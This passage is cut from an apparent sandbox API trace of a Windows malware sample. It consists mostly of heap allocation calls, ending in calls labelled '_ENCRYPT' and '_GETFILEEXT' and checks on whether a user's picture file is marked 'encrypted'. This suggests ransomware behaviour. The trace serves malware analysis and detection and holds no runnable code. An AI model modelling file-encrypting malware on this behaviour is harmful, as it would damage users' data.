hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0039.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0039.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0039.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.696] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0039.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0039.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.698] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0039.698] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0039.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0039.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.699] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.700] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9d0 [0039.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c9d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0039.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.700] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0039.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0039.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.700] CloseHandle (hObject=0x128) returned 1 [0039.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0039.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.701] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.701] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.701] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.702] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0039.702] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.702] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0039.702] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0039.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.702] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.702] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.702] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.702] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2618aff0, ftCreationTime.dwHighDateTime=0x1d5c1d3, ftLastAccessTime.dwLowDateTime=0xd82532f0, ftLastAccessTime.dwHighDateTime=0x1d5c2ea, ftLastWriteTime.dwLowDateTime=0xd82532f0, ftLastWriteTime.dwHighDateTime=0x1d5c2ea, nFileSizeHigh=0x0, nFileSizeLow=0x12195, dwReserved0=0x0, dwReserved1=0x777648, cFileName="77o YBs-VwSh8X3OiiJ.gif", cAlternateFileName="77OYBS~1.GIF")) returned 0x7c20c0 [0039.702] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.702] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.702] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2618aff0, ftCreationTime.dwHighDateTime=0x1d5c1d3, ftLastAccessTime.dwLowDateTime=0xd82532f0, ftLastAccessTime.dwHighDateTime=0x1d5c2ea, ftLastWriteTime.dwLowDateTime=0xd82532f0, ftLastWriteTime.dwHighDateTime=0x1d5c2ea, nFileSizeHigh=0x0, nFileSizeLow=0x12195, dwReserved0=0x0, dwReserved1=0x777648, cFileName="77o YBs-VwSh8X3OiiJ.gif", cAlternateFileName="77OYBS~1.GIF")) returned 0x7c20c0 [0039.702] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.703] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW 